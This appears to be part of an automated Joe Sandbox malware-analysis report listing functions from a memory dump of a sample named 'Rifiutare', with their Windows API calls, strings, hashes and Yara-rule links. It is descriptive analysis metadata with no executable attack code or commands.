Opcode Fuzzy Hash: b5c383c633e6cc9d2c51830282c8998c4f2ccc7820bf667cd54c88d3f91ff264
Instruction Fuzzy Hash: 1B11E73624830ABAEB165B55DC87D6AB79CAF15324F20007AFA02B71C1DAF29A814165

Function 00C9E5F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C9E60B
gethostname.WSOCK32(?,00000100), ref: 00C9E625
gethostbyname.WSOCK32(?), ref: 00C9E632
inet_ntoa.WSOCK32(?), ref: 00C9E674
_strcat.LIBCMT ref: 00C9E682
WSACleanup.WSOCK32 ref: 00C9E6A7

Strings

0.0.0.0, xrefs: 00C9E650

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: f4683d3bfa318329ceb6f62a7839c15b6348e3cee36dfaced278fa22026d36bf
Instruction ID: e6b40704298d6052cf5eb1ea5ef13f7a1eb7ae6e0af9c0c9f6a3de2a2bd475ad
Opcode Fuzzy Hash: f4683d3bfa318329ceb6f62a7839c15b6348e3cee36dfaced278fa22026d36bf
Instruction Fuzzy Hash: B611DF71904218ABCB24AB61DC0AFEE77BCEB60711F0400B9F912A6091EF708AC59A59

Function 00C9F4F0 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C9F501
_wcslen.LIBCMT ref: 00C9F512
_wcslen.LIBCMT ref: 00C9F550
_wcslen.LIBCMT ref: 00C9F586
_wcslen.LIBCMT ref: 00C9F5B6
_wcslen.LIBCMT ref: 00C9F5C6
_wcslen.LIBCMT ref: 00C9F602
_wcslen.LIBCMT ref: 00C9F631

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 43565fc13be1f4026d5dbeee964bd012d86e39c88218aa60f663429bc2d4a297
Instruction ID: f01cf64f55e8f42ac4752defab15954ac85dbf4499ec2d25578fd0671f0e0a9a
Opcode Fuzzy Hash: 43565fc13be1f4026d5dbeee964bd012d86e39c88218aa60f663429bc2d4a297
Instruction Fuzzy Hash: 6E419F69C10214A5CB11EBF4C84AECEB7BCAF05341F508466F919E3161FA34D39ACBA9

Function 00CC33DD Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CC33F5
GetDC.USER32(00000000), ref: 00CC33FD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC3408
ReleaseDC.USER32(00000000,00000000), ref: 00CC3414
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CC3450
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC3461
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CC6141,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC349C
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC34BB

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 9885ba8bb38285d5f0919bad3eb9fed231d9b43d02e55bce62d25de3b8192762
Instruction ID: a4a508cb8b5b5346eed0a498ccedac90d84f942b96c626ac94a6932281f73410
Opcode Fuzzy Hash: 9885ba8bb38285d5f0919bad3eb9fed231d9b43d02e55bce62d25de3b8192762
Instruction Fuzzy Hash: 73319C72201624BFEB158F14DC8AFEB3FA9EF49711F044065FE099A291C6759D41CBA0

Function 00CB5777 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00CB57F7, 00CB5B4C
Not an Object type, xrefs: 00CB57D0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 3cb256317f900e5ce5992b8aaeb31d09dbf5292fc9fb584ebe7e6340e9ce0ce4
Instruction ID: 095660149145f3e8d10397b636d49c15a40e21d69877d12717d7123e37675b69
Opcode Fuzzy Hash: 3cb256317f900e5ce5992b8aaeb31d09dbf5292fc9fb584ebe7e6340e9ce0ce4
Instruction Fuzzy Hash: 6ED1B071A0060AAFDF10DFA8C881FEEB7B5BF48314F148069E915AB281E771DE45CB60

Function 00CB4CF6 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CB4E1B
VariantInit.OLEAUT32(?), ref: 00CB4F1C
VariantClear.OLEAUT32(?), ref: 00CB4F26
VariantClear.OLEAUT32(?), ref: 00CB4F83

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00CB4EFF
Null Object assignment in FOR..IN loop, xrefs: 00CB4DAB, 00CB4ED9, 00CB4F91

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 3a803a3520ea6858fe046db46ed0458e846423166b6e6bbf77fb1bd5346be9b5
Instruction ID: 6a53ba4a3afee939e4f72c665d7fe4fa6a3a42bc46879b192984a7bd539facf5
Opcode Fuzzy Hash: 3a803a3520ea6858fe046db46ed0458e846423166b6e6bbf77fb1bd5346be9b5
Instruction Fuzzy Hash: 44919C71A04219ABDF28CFA5C848FEEBBB8FF45714F108559F515AB282D7709A44CFA0

Function 00CB411A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CB413E
CharUpperBuffW.USER32(?,?), ref: 00CB424D
_wcslen.LIBCMT ref: 00CB425D
VariantClear.OLEAUT32(?), ref: 00CB43F2

Part of subcall function 00CA1570: VariantInit.OLEAUT32(00000000), ref: 00CA15B0
Part of subcall function 00CA1570: VariantCopy.OLEAUT32(?,?), ref: 00CA15B9
Part of subcall function 00CA1570: VariantClear.OLEAUT32(?), ref: 00CA15C5

Strings

Incorrect Parameter format, xrefs: 00CB4179, 00CB4374
AUTOIT.ERROR, xrefs: 00CB4253, 00CB4258

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: affe6d3d8e9f950481cdb7e0b0039f8d93f7b1d71b9a14254330eab6c99c0a8a
Instruction ID: d33b579cc56b87f0df375d3cd7630399ccf59bcb8898998ca358afa46f4ba74b
Opcode Fuzzy Hash: affe6d3d8e9f950481cdb7e0b0039f8d93f7b1d71b9a14254330eab6c99c0a8a
Instruction Fuzzy Hash: EE914874A083019FCB08DF68C48096AB7E5FF89714F14892DF89A97352DB31EE45DB92

Function 00CB5381 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00C9082D: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?,?,00C90B7D), ref: 00C9084A
Part of subcall function 00C9082D: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90865
Part of subcall function 00C9082D: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?,?), ref: 00C90873
Part of subcall function 00C9082D: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C90760,80070057,?), ref: 00C90883

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00CB5425
_wcslen.LIBCMT ref: 00CB552D
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00CB55A3
CoTaskMemFree.OLE32(?), ref: 00CB55AE

Strings

NULL Pointer assignment, xrefs: 00CB55F7, 00CB5626

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: cd6b48502885a98c63a030d8943c0a494064e1a91d44d47114c19073358d3503
Instruction ID: ef0cf42897b24e27c0dcdf0d5bc42e8f8314f9361e0bf6d0502e4366dc9072ec
Opcode Fuzzy Hash: cd6b48502885a98c63a030d8943c0a494064e1a91d44d47114c19073358d3503
Instruction Fuzzy Hash: 2F91F771D006199FDF25DFA4D881EEEBBB9BF08300F104569E915A7291EB709E48DFA0

Function 00CC27D7 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00CC285D
GetMenuItemCount.USER32(00000000), ref: 00CC288F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CC28B7
_wcslen.LIBCMT ref: 00CC28ED
GetMenuItemID.USER32(?,?), ref: 00CC2927
GetSubMenu.USER32(?,?), ref: 00CC2935

Part of subcall function 00C94251: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9426B
Part of subcall function 00C94251: GetCurrentThreadId.KERNEL32 ref: 00C94272
Part of subcall function 00C94251: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C92DB3), ref: 00C94279

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CC29BD

Part of subcall function 00C9F152: Sleep.KERNEL32 ref: 00C9F1CA

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 355f4c8cd14e6cae19ff802cd45cc03240238e467b43f360d13b8dd7ef92c7e9
Instruction ID: 88db3ba60526defefe7844cd0bcebd968a262c8f6eabb56ff43b7c524572de2a
Opcode Fuzzy Hash: 355f4c8cd14e6cae19ff802cd45cc03240238e467b43f360d13b8dd7ef92c7e9
Instruction Fuzzy Hash: EC715C75A00205AFCB04EF65C885FAEBBB5EF48310F14846DE866EB351DB34EA41DB90

Function 00CC84A6 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00CC853F
IsWindowEnabled.USER32(00000000), ref: 00CC854B
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00CC8626
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00CC8659
IsDlgButtonChecked.USER32(?,00000000), ref: 00CC8691
GetWindowLongW.USER32(00000000,000000EC), ref: 00CC86B3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CC86CB

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: c25e2b5a024a6a5bdd56e656e0bdafdfd4b1bf2de44c6602852602aafa9d1c6a
Instruction ID: 87c5a97460314138414b8ea68876d34bb6ed2fe84c0e856ffe3ed10c217aa0a9
Opcode Fuzzy Hash: c25e2b5a024a6a5bdd56e656e0bdafdfd4b1bf2de44c6602852602aafa9d1c6a
Instruction Fuzzy Hash: 9A719A74A00205AFEF219F54C884FABBBB9EF09310F14405DF966972A1CB71AE49DB54

Function 00C9B6DE Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C9B71D
GetKeyboardState.USER32(?), ref: 00C9B732
SetKeyboardState.USER32(?), ref: 00C9B793
PostMessageW.USER32(00000000,00000101,00000010,?), ref: 00C9B7C1
PostMessageW.USER32(00000000,00000101,00000011,?), ref: 00C9B7E0
PostMessageW.USER32(00000000,00000101,00000012,?), ref: 00C9B821
PostMessageW.USER32(00000000,00000101,0000005B,?), ref: 00C9B844

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d0a0329dee490e2a6cca77a5a908cd3094419e9aefce443627e3768530f02455
Instruction ID: 9c36a4bc1ef3365751579e26fb3adb9342c64bc083a236860eeb698d69dea88b
Opcode Fuzzy Hash: d0a0329dee490e2a6cca77a5a908cd3094419e9aefce443627e3768530f02455
Instruction Fuzzy Hash: 045102A0A047D57DFF364274DD4DBBABEA95B46300F088989E0E5458D2C7E8EEC4E760

Function 00C9B4FE Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C9B53D
GetKeyboardState.USER32(?), ref: 00C9B552
SetKeyboardState.USER32(?), ref: 00C9B5B3
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C9B5DF
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C9B5FC
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C9B63B
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C9B65C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7ed4ebe77bdcf72c4622f2f1e88c617d0ff742a297ed5ee41b3dd7a6a121d689
Instruction ID: 7ea577e3d9dbde2812bcadda3fb9353b29498db2ff56428ca23b423ccc4bcb01
Opcode Fuzzy Hash: 7ed4ebe77bdcf72c4622f2f1e88c617d0ff742a297ed5ee41b3dd7a6a121d689
Instruction Fuzzy Hash: CF51E6A09087DA7EFF368734DD59B7ABEA95B05700F088489F0E9468C2D794FE84E750

Function 00C6584E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00C65FC3,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00C65890
__fassign.LIBCMT ref: 00C6590B
__fassign.LIBCMT ref: 00C65926
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00C6594C
WriteFile.KERNEL32(?,FF8BC35D,00000000,00C65FC3,00000000,?,?,?,?,?,?,?,?,?,00C65FC3,?), ref: 00C6596B
WriteFile.KERNEL32(?,?,00000001,00C65FC3,00000000,?,?,?,?,?,?,?,?,?,00C65FC3,?), ref: 00C659A4

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c24b1bcab0ab2a2eaa6d74f22da530ff1871c04b4e03209c83a04ad524bfc075
Instruction ID: 6bffd51d9b69a8a58acc9e033bccfce7d04259f05dc1edd724a4100998c43a4d
Opcode Fuzzy Hash: c24b1bcab0ab2a2eaa6d74f22da530ff1871c04b4e03209c83a04ad524bfc075
Instruction Fuzzy Hash: 3551A775E00649DFDB20CFA8D885BEEBBF9EF09310F24415AE556E7291D7309A42CB60

Function 00C53140 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C5316B
___except_validate_context_record.LIBVCRUNTIME ref: 00C53173
_ValidateLocalCookies.LIBCMT ref: 00C53201
__IsNonwritableInCurrentImage.LIBCMT ref: 00C5322C
_ValidateLocalCookies.LIBCMT ref: 00C53281

Strings

csm, xrefs: 00C53216

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 8271d071af62a6112a72e49815611b7f4d32bd0d680c12b64cdabc02d5b79968
Instruction ID: 43d3a14b0de15732f2f6aa3c3b76766623cf48ad1ad7cca223f112b12ddfb170
Opcode Fuzzy Hash: 8271d071af62a6112a72e49815611b7f4d32bd0d680c12b64cdabc02d5b79968
Instruction Fuzzy Hash: 6841D638A006889BCF10DF78CC45AAE7BB5AF44395F148155EC256B392D731DB89CB94

Function 00CB18FE Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB3821: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CB384D
Part of subcall function 00CB3821: _wcslen.LIBCMT ref: 00CB386E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB1958
WSAGetLastError.WSOCK32 ref: 00CB1967
WSAGetLastError.WSOCK32 ref: 00CB1A0F
closesocket.WSOCK32(00000000), ref: 00CB1A3F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 13820e295623636aef6f0fd374eab60ff0d9c33eaada38ffd0ac586893891665
Instruction ID: 0944e7f76aa7b88fd084b45fc7b96f1ac8e41c6bd9d50bb6180bbda3a494b37d
Opcode Fuzzy Hash: 13820e295623636aef6f0fd374eab60ff0d9c33eaada38ffd0ac586893891665
Instruction Fuzzy Hash: E741B631600254AFDB109F24C895BEEB7E9EF45364F188069FC5AAB291C774EE41CBE1

Function 00C9D656 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C9D678,?), ref: 00C9E5C6

Part of subcall function 00C9E5A9: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C9D678,?), ref: 00C9E5DF

lstrcmpiW.KERNEL32(?,?), ref: 00C9D69B
MoveFileW.KERNEL32(?,?), ref: 00C9D6D5
_wcslen.LIBCMT ref: 00C9D75B
_wcslen.LIBCMT ref: 00C9D771
SHFileOperationW.SHELL32(?), ref: 00C9D7B7

Strings

\*.*, xrefs: 00C9D749

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 29642b64d66e02c82ff9e4efed9b65d178768def0f9593ace9d775ef091f1a15
Instruction ID: 6375bd1aa3fc104d9ad664a74c8e9467fe7c08d70061524df17350dc4dec36ad
Opcode Fuzzy Hash: 29642b64d66e02c82ff9e4efed9b65d178768def0f9593ace9d775ef091f1a15
Instruction Fuzzy Hash: CD417771D452189EDF12EFA4D985EDE73B8AF18380F1000E6E50AFB142EB35A788DB50

Function 00CC34D7 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00CC34F6
GetWindowLongW.USER32(?,000000F0), ref: 00CC3529
GetWindowLongW.USER32(?,000000F0), ref: 00CC355E
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00CC3590
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00CC35BA
